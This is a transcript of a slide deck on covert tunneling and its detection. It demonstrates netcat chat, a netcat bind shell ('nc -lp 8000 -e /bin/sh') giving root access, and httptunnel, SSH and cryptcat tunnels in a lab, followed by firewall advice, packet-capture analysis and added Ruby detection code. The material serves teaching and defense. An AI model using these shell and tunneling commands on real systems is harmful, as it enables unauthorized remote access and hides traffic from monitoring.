Ccue Janicki Richard

Transcript of Ccue Janicki Richard

  • 8/13/2019 Ccue Janicki Richard

    1/30

    COVERT TUNNELING

    Uses and Detection

    Rich Janicki

    2/30

    WHAT IS COVERT TUNNELING?

    Today covert tunnels are defined as those that use entities not normally viewed as data objects, but that can be manipulated maliciously to transfer information from one subject to another [2].

    Some protocols that can be used are HTTP, ICMP, DNS, and SSH, to name a few.

    Steganography can be used to conceal data in image files such as JPEG.

    3/30

    WHY IS COVERT TUNNELING IMPORTANT?

    As a network administrator, one could use covert tunneling for good:
    It can provide a safe way to maintain servers
    It can hide sensitive data from prying eyes
    It allows one to test network equipment designed to prevent the use of these techniques

    Hackers can use tunneling to hide their tracks
    Malware can use tunneling to receive updates and commands, as well as to hide its activities

    4/30

    HACKERS USE COVERT TUNNELING?

    As stated earlier, malware programs can use tunneling to send and receive commands
    Botnets thrive on the ability to use tunneling
    The combination of these techniques allows the botnet operator to remain hidden while controlling many computers
    Trojans/backdoors use common tools, or variations of these tools, to allow remote access to a compromised system
    Knowing how these tools operate is key to defending against them

    5/30

    DEMONSTRATION OF COVERT TUNNELING

    6/30

    NETCAT

    The Swiss Army Knife of TCP/IP

    Many uses, including backdoors, port scanning, port listening, simple file sharing, and simple chat
    Integrates well with covert tunneling
    Implements easily into programs and scripting

    7/30

    NETCAT ON TARGET

    ****Netcat****

    root@bt:~# nc -lp 8000
    hello
    hi
    this is a basic netcat conversation
    ok
    goodbye
    see you later

    8/30

    NETCAT ON ATTACKER

    ****Netcat Chat****

    rich@netbookremix:~$ nc 192.168.1.121 8000
    hello
    hi
    this is a basic netcat conversation
    ok
    goodbye
    see you later
    ^C

    9/30

    NETCAT SHELL ON TARGET

    ****Netcat Shell****

    root@bt:~# nc -lp 8000 -e /bin/sh

    10/30

    NETCAT SHELL ON ATTACKER

    ****Netcat Shell****

    rich@netbookremix:~$ nc 192.168.1.121 8000
    whoami
    root
    ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:0c:76:32:56:61
              inet addr:192.168.1.121  Bcast:192.168.1.255  Mask:255.255.255.0
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:27 errors:0 dropped:0 overruns:0 frame:0
              TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:2452 (2.4 KB)  TX bytes:1855 (1.8 KB)
              Interrupt:23 Base address:0xcc00

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

    11/30

    HTTPTUNNEL

    ****Netcat over Httptunnel (Target)****

    root@bt:~# hts -F localhost:8000 80
    root@bt:~# nc -lp 8000

    ****Netcat over Httptunnel (Attacker)****

    rich@netbookremix:~$ htc -F 10001 192.168.1.121:80
    rich@netbookremix:~$ nc 127.0.0.1 10001

    12/30

    SSH

    ****Normal SSH****

    rich@netbookremix:~$ ssh root@192.168.1.121
    root@192.168.1.121's password:
    BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
    Last login: Thu Mar 18 21:57:43 2010
    root@bt:~# whoami
    root

    13/30

    SSH OVER HTTPTUNNEL

    ****SSH over Httptunnel (Target)****

    root@bt:~# hts -F localhost:22 8081

    ****SSH over Httptunnel (Attacker)****

    rich@netbookremix:~$ htc -F 10003 192.168.1.121:8081
    rich@netbookremix:~$ ssh root@127.0.0.1 -p 10003
    The authenticity of host '[127.0.0.1]:10003 ([127.0.0.1]:10003)' can't be established.
    RSA key fingerprint is 62:fb:a9:b3:67:f0:6d:c8:58:f1:1a:01:2c:21:89:73.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '[127.0.0.1]:10003' (RSA) to the list of known hosts.
    root@127.0.0.1's password:
    BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
    Last login: Thu Mar 18 22:06:26 2010 from 192.168.1.115
    root@bt:~# whoami
    root

    14/30

    CRYPTCAT

    ****Cryptcat****

    root@bt:~# cryptcat -lp 9000
    hello
    hi
    this conversation is a basic cryptcat conversation
    that means its encrypted right?
    yes sir
    goodbye
    see you later

    15/30

    16/30

    TOOLS TO DEFEND AGAINST COVERT TUNNELING

    Web Tap (commercial product)
    Open source firewalls such as IPCop or Smoothwall
    Wireshark, NetworkMiner, or NetWitness
    Snort Intrusion Detection System (IDS)

    17/30

    FIREWALL RULES

    Prevent unwanted traffic
    Close and stop unnecessary ports and services
    Prevent ACK tunneling by examining the way a connection is initialized
    Set connection timeouts
    Enable content filtering
    Use Intrusion Detection Systems
    Use proxies with authentication
    Don't allow HTTP CONNECT queries
    Use anti-virus and anti-malware programs
    Inspect log files regularly, monitor traffic, and build statistics of both [10]

    18/30

    19/30

    WIRESHARK

    20/30

    WIRESHARK

    21/30

    WIRESHARK

    22/30

    PCAPDUMP.RB

    Programmed in Ruby
    Uses the Ruby pcap and pcaplet libraries
    Command-line tool to ease viewing pcap files
    To be used on already captured pcap files
    User can see plain text information being sent over the network faster
    Tool I created to learn more about pcap files and to help understand network protocols

    rich@netbookremix:~/presentation$ ruby pcapdump.rb -r alltestshub.pcap

    23/30

    PCAPDUMP.RB

    ****************pcapdump by Rich Janicki********************
    23:01:30.842629 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
    DATA---> hello
    ---------------------------------------------------------------
    23:01:37.310009 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
    DATA---> hi
    ---------------------------------------------------------------
    23:01:48.922890 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
    DATA---> this is a basic netcat conversation
    ---------------------------------------------------------------
    23:01:55.845469 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
    DATA---> ok
    ---------------------------------------------------------------
    23:01:59.603798 192.168.1.115:34828 > 192.168.1.121:8000 .AP...
    DATA---> goodbye
    ---------------------------------------------------------------
    23:02:06.518693 192.168.1.121:8000 > 192.168.1.115:34828 .AP...
    DATA---> see you later
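    pcapdump.rb itself relies on the ruby-pcap and pcaplet gems, which are not shown on the slides. As an added example that is not the author's tool, the dependency-free Ruby reader below parses the libpcap file format (global header, per-record headers, Ethernet/IPv4/TCP) and prints records in the same style as the output above; the sample capture is constructed inline from the first two netcat packets of that output, and the byte-permutation, dummy MAC addresses and UTC timestamps are this example's own choices.

```ruby
# Dependency-free Ruby reader for the libpcap file format that prints records in the pcapdump.rb
# style seen on the slides: "HH:MM:SS.usec src:port > dst:port .AP..." then "DATA---> payload".
# Only Ethernet/IPv4/TCP frames are handled; anything else is skipped.

def tcp_flags(byte)   # letters in the slides' order URG ACK PSH RST SYN FIN (bits 0x20 down to 0x01)
  "UAPRSF".chars.each_with_index.map { |c, i| (byte & (0x20 >> i)) != 0 ? c : "." }.join
end

# Parse one captured frame into a record hash, or nil if it is not IPv4/TCP.
def parse_frame(sec, usec, frame)
  return nil unless frame.bytesize >= 54 && frame[12, 2].unpack1("n") == 0x0800
  ip = frame[14..-1]
  return nil unless ip.getbyte(9) == 6                     # IP protocol 6 = TCP
  ihl = (ip.getbyte(0) & 0x0f) * 4
  tcp = ip[ihl, ip[2, 2].unpack1("n") - ihl]               # IP total length bounds the segment
  doff = (tcp.getbyte(12) >> 4) * 4                        # TCP header length
  { ts: Time.at(sec, usec).utc.strftime("%H:%M:%S.%6N"),
    src: "#{ip[12, 4].unpack('C4').join('.')}:#{tcp.unpack1('n')}",
    dst: "#{ip[16, 4].unpack('C4').join('.')}:#{tcp[2, 2].unpack1('n')}",
    flags: tcp_flags(tcp.getbyte(13)), data: tcp[doff..-1] }
end
# Walk a libpcap byte string (little-endian magic, linktype 1 = Ethernet); return the records.
def read_pcap(bytes)
  magic, link = bytes[0, 24].unpack("VvvVVVV").values_at(0, 6)
  raise "expected a little-endian Ethernet pcap" unless magic == 0xa1b2c3d4 && link == 1
  off, recs = 24, []
  while off + 16 <= bytes.bytesize
    sec, usec, incl, _orig = bytes[off, 16].unpack("VVVV")
    rec = parse_frame(sec, usec, bytes[off + 16, incl])
    recs << rec if rec
    off += 16 + incl
  end
  recs
end
# Constructed sample capture (not a real pcap from the talk): the first two netcat packets.
def build_frame(src, dst, sport, dport, payload)
  ip = ->(a) { a.split(".").map(&:to_i).pack("C4") }
  tcp = [sport, dport, 1, 1, 0x50, 0x18, 65535, 0, 0].pack("nnNNCCnnn") + payload.b  # PSH+ACK
  ipv4 = [0x45, 0, 20 + tcp.bytesize, 1, 0, 64, 6, 0].pack("CCnnnCCn") + ip[src] + ip[dst]
  ("\x00" * 12).b + [0x0800].pack("n") + ipv4 + tcp                                  # zero MACs
end

def sample_pcap
  f1 = build_frame("192.168.1.115", "192.168.1.121", 34828, 8000, "hello")
  f2 = build_frame("192.168.1.121", "192.168.1.115", 8000, 34828, "hi")
  [0xa1b2c3d4, 2, 4, 0, 0, 65535, 1].pack("VvvVVVV") +
    [82890, 842629, f1.bytesize, f1.bytesize].pack("VVVV") + f1 +   # 23:01:30.842629 UTC
    [82897, 310009, f2.bytesize, f2.bytesize].pack("VVVV") + f2     # 23:01:37.310009 UTC
end

read_pcap(sample_pcap).each { |r| puts "#{r[:ts]} #{r[:src]} > #{r[:dst]} #{r[:flags]}\nDATA---> #{r[:data]}\n#{'-' * 63}" }
```

    To run it on a real capture, replace sample_pcap with File.binread of the .pcap file; pcapng captures use a different container and are not handled here.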

    24/30

    PCAPDUMP.RB

    ---------------------------------------------------------------
    23:02:49.115744 192.168.1.115:34829 > 192.168.1.121:8000 .AP...
    DATA---> ifconfig
    ---------------------------------------------------------------
    23:02:49.117790 192.168.1.121:8000 > 192.168.1.115:34829 .AP...
    DATA---> eth0 Link encap:Ethernet HWaddr 00:0c:76:32:56:61
    inet addr:192.168.1.121 Bcast:192.168.1.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:27 errors:0 dropped:0 overruns:0 frame:0
    TX packets:21 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:2452 (2.4 KB) TX bytes:1855 (1.8 KB)
    Interrupt:23 Base address:0xcc00

    25/30

    PCAPDUMP CATCHING HTTPTUNNEL

    ---------------------------------------------------------------
    23:04:33.718566 192.168.1.115:56256 > 192.168.1.121:80 .AP...
    DATA---> GET /index.html?crap=1268967869 HTTP/1.1
    ---------------------------------------------------------------
    23:04:33.719179 192.168.1.115:56256 > 192.168.1.121:80 .AP...
    DATA---> Host: 192.168.1.121:80
    Connection: close
    ---------------------------------------------------------------
    23:04:33.719428 192.168.1.121:80 > 192.168.1.115:56256 .AP...
    DATA---> HTTP/1.1 200 OK
    Content-Length: 102400
    Connection: close
    Pragma: no-cache
    Cache-Control: no-cache, no-store, must-revalidate
    Expires: 0
    Content-Type: text/html

    26/30

    PCAPDUMP CATCHING HTTPTUNNEL

    ---------------------------------------------------------------
    23:04:35.657512 192.168.1.115:56255 > 192.168.1.121:80 .AP...
    DATA--->
    ---------------------------------------------------------------
    23:04:35.657515 192.168.1.115:56255 > 192.168.1.121:80 .AP...
    DATA---> hello
    ---------------------------------------------------------------
    23:04:38.660736 192.168.1.121:80 > 192.168.1.115:56256 .AP...
    DATA---> E
    ---------------------------------------------------------------
    Content-Type: text/html

    27/30

    CATCHING SSH

    ---------------------------------------------------------------
    23:06:28.404301 192.168.1.121:22 > 192.168.1.115:54506 .AP...
    DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
    ---------------------------------------------------------------
    23:06:28.410369 192.168.1.115:54506 > 192.168.1.121:22 .AP...
    DATA---> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
    ---------------------------------------------------------------
    23:06:28.410858 192.168.1.115:54506 > 192.168.1.121:22 .AP...
    DATA---> ^wx?0JJf{~diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
    ssh-rsa,ssh-dss
    aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
    aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
    hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
    hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
    none,zlib@openssh.com,zlib
    none,zlib@openssh.com,zlib
    ---------------------------------------------------------------

    28/30

    EXAMPLE SSH PACKET

    23:06:28.411906 192.168.1.115:54506 > 192.168.1.121:22 .AP...
    DATA---> "
    ---------------------------------------------------------------
    23:06:28.423842 192.168.1.121:22 > 192.168.1.115:54506 .AP...
    DATA---> IiL7+ec~x^+
    '+"d{ w3-
    SX]vj6&Fb?J`[G&Q
    sUceL
    Be rA('\
    ---------------------------------------------------------------

    29/30

    EXAMPLE CRYPTCAT PACKET

    ---------------------------------------------------------------
    23:12:36.584469 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
    DATA---> QJmQk,N
    ---------------------------------------------------------------
    23:12:36.584479 192.168.1.115:57305 > 192.168.1.121:9000 .AP...
    DATA--->
    192.168.1.115:57305 .AP...
    DATA--->
    >9M
    ---------------------------------------------------------------
    23:12:43.066825 192.168.1.121:9000 > 192.168.1.115:57305 .AP...
    DATA---> 3f_8=M
    ---------------------------------------------------------------
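    The captures on slides 23 through 29 show what separates the three tunnels on the wire: httptunnel's GET with a ?crap= timestamp and its 102400-byte no-cache response, raw netcat text riding on port 80, and unreadable cryptcat bytes on port 9000. As an added example that is not part of the talk, the Ruby heuristics below turn those observations into automatic findings over pcapdump-style records; the record shape, regexes and entropy threshold are this example's own choices, and the sample records are constructed from the slide output with a stand-in for the ciphertext.

```ruby
# Detection heuristics over pcapdump-style records for the three cases the slides capture:
# httptunnel on port 80, raw netcat data riding inside that tunnel, and cryptcat ciphertext on 9000.
# The record shape, regexes and thresholds are this example's own choices, not pcapdump.rb's.
HTTP_START = %r{\A(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|CONNECT) \S+ HTTP/1\.[01]\r?\n|\AHTTP/1\.[01] \d{3} }
ENCRYPTED_PORTS = [22, 443].freeze   # ports where high-entropy payloads are expected anyway
# Shannon entropy in bits per byte (0.0 .. 8.0).
def entropy(data)
  return 0.0 if data.empty?
  n = data.bytesize.to_f
  counts = data.each_byte.each_with_object(Hash.new(0)) { |b, h| h[b] += 1 }
  counts.values.reduce(0.0) { |acc, c| acc - (c / n) * Math.log2(c / n) }
end
# Entropy relative to the most a payload of this size could carry; ciphertext approaches 1.0.
def entropy_ratio(data)
  data.bytesize < 2 ? 0.0 : entropy(data) / Math.log2([data.bytesize, 256].min)
end

# Returns a finding string for a suspicious record, or nil when nothing stands out.
def classify(rec)
  d = rec[:data]
  port = [rec[:src], rec[:dst]].map { |e| e.split(":").last.to_i }.min   # lower port = service side
  if port == 80
    return "httptunnel client request (?crap=<timestamp> query)" if d =~ %r{\AGET /\S*\?crap=\d+ HTTP/}
    if d =~ %r{\AHTTP/1\.[01] 200 OK} && d.include?("Content-Length: 102400") && d.include?("Cache-Control: no-cache")
      return "httptunnel server response (102400-byte no-cache body)"
    end
    return "non-HTTP payload on port 80 (#{d.bytesize} bytes)" unless d.empty? || d =~ HTTP_START
  elsif !ENCRYPTED_PORTS.include?(port) && d.bytesize >= 64 && entropy_ratio(d) > 0.9
    return "high-entropy payload on port #{port}, which is not a TLS/SSH port"
  end
  nil
end

def findings(records)
  records.map { |r| (f = classify(r)) && "#{r[:ts]} #{r[:src]} > #{r[:dst]}  #{f}" }.compact
end
# Constructed records modelled on slides 23, 25, 26 and 29 (payloads shortened; the ciphertext is a stand-in).
def sample_records
  fake_ct = (0..255).map { |i| (i * 167 + 13) & 0xff }.pack("C*")   # byte permutation: entropy 8.0
  [{ ts: "23:01:30.842629", src: "192.168.1.115:34828", dst: "192.168.1.121:8000", data: "hello" },
   { ts: "23:04:33.718566", src: "192.168.1.115:56256", dst: "192.168.1.121:80",
     data: "GET /index.html?crap=1268967869 HTTP/1.1\r\nHost: 192.168.1.121:80\r\nConnection: close\r\n\r\n" },
   { ts: "23:04:33.719428", src: "192.168.1.121:80", dst: "192.168.1.115:56256",
     data: "HTTP/1.1 200 OK\r\nContent-Length: 102400\r\nConnection: close\r\nPragma: no-cache\r\n" \
           "Cache-Control: no-cache, no-store, must-revalidate\r\nExpires: 0\r\nContent-Type: text/html\r\n\r\n" },
   { ts: "23:04:35.657515", src: "192.168.1.115:56255", dst: "192.168.1.121:80", data: "hello" },
   { ts: "23:12:36.584469", src: "192.168.1.115:57305", dst: "192.168.1.121:9000", data: fake_ct }]
end

findings(sample_records).each { |line| puts line }
```

    The plain netcat chat on port 8000 is deliberately not flagged: short cleartext on an unregistered port is what the pcapdump output itself already makes visible to the analyst.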

    30/30

    CONCLUSION

    Some things to think about:

    These tests were performed on a local network
    They can be expanded to simulate an attack on a large network
    Pcap files can get very large, very quickly
    Don't run Wireshark for extended periods of time
    All of the tests were captured in about 15 minutes using one pcap file
    Using pcapdump to save the output to a text file (in this case) creates a fairly large file